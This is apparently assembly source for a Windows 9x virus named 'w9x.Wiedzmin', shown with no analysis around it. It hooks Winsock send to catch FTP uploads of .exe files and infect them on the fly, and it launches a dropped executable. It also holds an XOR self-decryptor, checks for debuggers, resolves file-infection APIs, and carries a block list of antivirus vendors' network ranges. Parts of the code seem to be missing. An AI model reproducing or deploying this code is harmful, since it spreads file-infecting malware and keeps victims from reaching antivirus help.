mov ebx,[esp+28h] ;20(PUSHAD)+8(FAR *buf)
mov eax,[ebx]
cmp eax,'ROTS' ;FTP: Storing a file ? ;)
je _ftp_store
popad ;tHe oRgInaL sEnd
push [esp+10h] ;int flags
push [esp+4+0Ch] ;int len
push [esp+8+8] ;const char FAR * buf
push [esp+0Ch+4] ;SOCKET s
call dword ptr [eax+a_send] ;call orginal send!!!
out_s: retn 10h
_ftp_store: ;yeah! infect on tha fly
mov edx,[esp+28h] ;point to name =]
add edx,5 ;skip STOR and one space (5 bytes)
mov esi,[esp+28h]
cmp al,'.' ;find first dod
jne @loop
dec esi
mov esi,[esi] ;a exe file!?
cmp esi,'EXE.'
je try_it
cmp esi,'exe.'
je try_it
jmp TOS
mov ecx,edi
lea edi,[ecx+offset buff]
mov esi,edx
xor edx,edx
cmp al,0dh
je _end
inc edx
jmp _l
mov edi,edx
lea edx,[ecx+offset buff]
lea ebx,[ecx+offset inf_prog]
push ecx ;preserve ecx
push ebx
push 260
call dword ptr [ecx+gcd] ;tricky ;] GetCurrentDirectory
;ftp clients use that to locate
pop ecx ;load ecx
mov eax,edi
xor ebx,ebx
lea esi,[ecx+offset inf_prog]
inc ebx
cmp al,0
jne _loop_1
lea edi,[ecx+offset inf_prog] ;add \ to patch ;]
add edi,ebx
dec edi
mov al,'\'
lea esi,[ecx+offset buff]
_l2: ;well optimised strcat
cmp al,0
je _skipp
jmp _l2
lea esi,[ecx+offset santa]
lea edi,[ecx+offset inf_prog2]
cmp al,0
je _catt
jmp _cat
mov al,' '
lea esi,[ecx+offset inf_prog]
cmp al,0
je done
jmp _make_real
mov edi,ecx
push 1
lea eax,[edi+offset inf_prog2]
push eax
call dword ptr [edi+wex]
jmp TOS
reset_err: push WSAECONNRESET
call dword ptr [edi+_WSASetLastError]
push -1
pop eax
jmp out_s
call @hookerdelta
pop eax
sub eax,offset @hookerdelta
a_send dd 0
a_connect dd 0
msgg dd 0BFF44146h
DO_WPISU: _WSASetLastError dd 0
wex dd 0
gcd dd 0
buff db 110 dup (0)
inf_prog2 db 260 dup (0)
inf_prog db 260 dup (0)
santa db 'C:\Program Files\deithwen.exe',0
;santa db 'C:\WINDOWS\CALC.EXE',0
;***********DENIED LIST*************************************************************************
;thx goez to T-2000/Immortal Riot ;]
DENIED: DB 161,069,003 ; nai.com
DB 216,122,008 ; avp.com
DB 195,170,248 ; avp.ru, kaspersky.ru, avp2000.com, kasperskylab.ru
DB 193,247,150 ; avp.ch, metro.ch
DB 194,252,006 ; datafellows.com, f-secure.com
DB 195,112,025 ; drsolomon.com
DB 208,228,231 ; mcafee.com
DB 194,203,134 ; sophos.com
DB 146,145,148 ; norman.com
DB 206,204,003 ; pandasoftware.com
DB 193,004,210 ; complex.is
DB 203,037,250 ; leprechaun.com.au
DB 141,202,248 ; cai.com
DB 216,033,022 ; antivirus.com, trendmicro.com
DB 216,035,137 ; sarc.com
DB 216,086,104 ; virus.com
DB 212,029,228 ; invircible.com
DB 208,226,167 ; symantec.com
DB 207,227,040 ; grisoft.com
DB 194,105,193 ; drweb.ru
DB 000,000,000 ; end of table.
hook_end label byte
A1 db 'send',0
A1s equ $-A1
A2 db 'connect',0
A2s equ $-A2
e_esi dd 0
APIS db 'GetProcAddress',0
APIList: db "FindFirstFileA",0
db "FindNextFileA",0
db "FindClose",0
db "SetFileAttributesA",0
db "SetFileTime",0
db "CreateFileA",0
db "CreateFileMappingA",0
db "MapViewOfFile",0
db "UnmapViewOfFile",0
db "GetFileTime",0
db "GetFileSize",0
db "GetFileAttributesA",0
db "SetFileAttributesA",0
db "ReadFile",0
db "WriteFile",0
db "SetFilePointer",0
db "SetEndOfFile",0
db "CloseHandle",0
db "SetCurrentDirectoryA",0
db "GetWindowsDirectoryA",0
db "GetSystemDirectoryA",0
db "CopyFileA",0
db "ExitProcess",0
db "GetTickCount",0
db "GetCommandLineA",0
db "IsDebuggerPresent",0
db "OutputDebugStringA",0
db "WinExec",0
db "LoadLibraryA",0
db "GetModuleHandleA",0
db "Sleep",0
db "GetSystemTime",0
db "WritePrivateProfileStringA",0
db "VirtualAlloc",0
db "VirtualFree",0
db "GetCurrentDirectoryA",0,07h ;07h stops the looking up
msg dd 0BFF44146h
key dd 0
;shit7 db "w.dll",0
marker db 'sru.exe',0
;marker db '*.exe',0
TO_CRYPT_DATA: to_ja: db 0ah,0dh
db "<w9x.Wiedzmin (c) - YuP - Welcome to new school>",0ah,0dh
db "¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥",0ah,0dh
db "Æ Deithwen Addan Flared Again",0ah,0dh
db "Æ You have eyez, but u can't see",0ah,0dh
db "Æ You have earz, but u can't hear",0ah,0dh
db "Æ Wake up from unreal world before",0ah,0dh
db "Æ you drown in the Sea of Chaos.",0ah,0dh
db "¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥¥",0ah,0dh
db 0ah,0dh,0
wsock db "\WSOCK32.dll",0
nowe db "\WZZOCK32.dll",0
sice9x db "\\.\SICE",0
sle db "WSASetLastError",0
user32 db "USER32.DLL",0
gdi32 db "GDI32.DLL",0
rename db "rename",0
jed db "X",0
famil db "Verdana",0
logo db ": w9x.WiEDZMiN has you :",0
deshit db "kfe",0,07h
push ecx
call dword ptr [ebp+_GetTickCount]
mov ebx,255
idiv ebx
mov ecx,edx
mov byte ptr [edi],90h
inc edi
loop @mutualisk
pop ecx
lea edx,[ebp+offset @to_this]
mov eax,[ebp+key_main]
mov ecx,TO_DE
xor byte ptr [edx],al
inc edx
loop @loop_decryptt
rep movsb
mov edi,'!PUY'
call @main_decryptor
key_main dd 0
;db 5 dup (90h)
; align dword
VirusEnd label byte
;=============================================VirtualData nie idzie do wira=====================
HeapStart label byte
finddata WIN32_FIND_DATA <> ;wskaznik do struktury
fileHandle dd 0
fileAtrib dd 0
licznik_b dd 0
APIListA: _FindFirstFileA dd 0
_FindNextFileA dd 0
_FindClose dd 0
_SetAttributesA dd 0
_SetFileTime dd 0
_CreateFileA dd 0
_CreateFileMappingA dd 0
_MapViewOfFile dd 0
_UnmapViewOfFile dd 0
_GetFileTime dd 0
_GetFileSize dd 0
_GetFileAttributesA dd 0
_SetFileAttributesA dd 0
_ReadFile dd 0
_WriteFile dd 0
_SetFilePointer dd 0
_SetEndOfFile dd 0
_CloseHandle dd 0
_SetCurrentDirectoryA dd 0
_GetWindowsDirectoryA dd 0
_GetSystemDirectoryA dd 0
_CopyFileA dd 0
_ExitProcess dd 0
_GetTickCount dd 0
_GetCommandLineA dd 0
_IsDebuggerPresent dd 0
_OutputDebugStringA dd 0
_WinExec dd 0
_LoadLibraryA dd 0
_GetModuleHandleA dd 0
_Sleep dd 0
_GetSystemTime dd 0
_WritePrivateProfileStringA dd 0
_VirtualAlloc dd 0
_VirtualFree dd 0
_GetCurrentDirectoryA dd 0
@GDI_APIZA: _CreateFontA dd 0
_TextOutA dd 0
_SetBkMode dd 0
_SetTextColor dd 0
_SelectObject dd 0
_GetSystemMetrics dd 0
_GetDesktopWindow dd 0
_GetWindowDC dd 0
_ReleaseDC dd 0
SYSTEM_TIME: wYear dw 0
wMonth dw 0
wDayOfWeek dw 0
wDay dw 0
wHour dw 0
wMinute dw 0
wSecond dw 0
wMilliseconds dw 0
F1: dd 2 dup (?)
F2: dd 2 dup (?)
F3: dd 2 dup (?)
vbuf dd 0
help_virus dd 0
memory dd 0
header dd 0
align dd 0
_hostIP dd 0
_secAlign dd 0
newEIP dd 0
NewEIP dd 0
firstk dd 0
key2 dd 0
go_wsock dd 0
wsock_h dd 0
moj_address dd 0
capis dd 0
wsock_hh dd 0
NON dd 0 ;numbers of names
AOF dd 0 ;addr of Functions
AON dd 0 ;addr of Names
AOO dd 0 ;addr of Ordinals
IndexA dd 0
_GPA dd 0
fHnd dd 0
fHndMap dd 0
fMapReal dd 0
fSize dd 0
my_seh dd 0
was_win dd 0
ic dd 0
sHnd dd 0
shitsize dd 0
oldDIR db 512 dup (?)
winDIR db 260 dup (?)
sysDIR db 260 dup (?)
winDIRr db 260 dup (?)
db 5 dup (?)
toHOST dd 0
; align dword
HeapEnd label byte
titlee db "w9x.Wiedzmin by YuP - 1st Generation",0
bodyy db "Elaine blath, Feainnewedd",0ah,0dh
db "Dearme aen a'caelme tedd",0ah,0dh
db "Eigean evelienn deireadh",0ah,0dh
db "Que'n esse, va en esseath",0ah,0dh
db "Feainnewedd, elaine blath!"
db 0ah,0dh
db " bytes",0
push 0h
push offset titlee
push offset bodyy
push 0h
call MessageBoxA
push 0h
call ExitProcess
endshit: ends
End v_start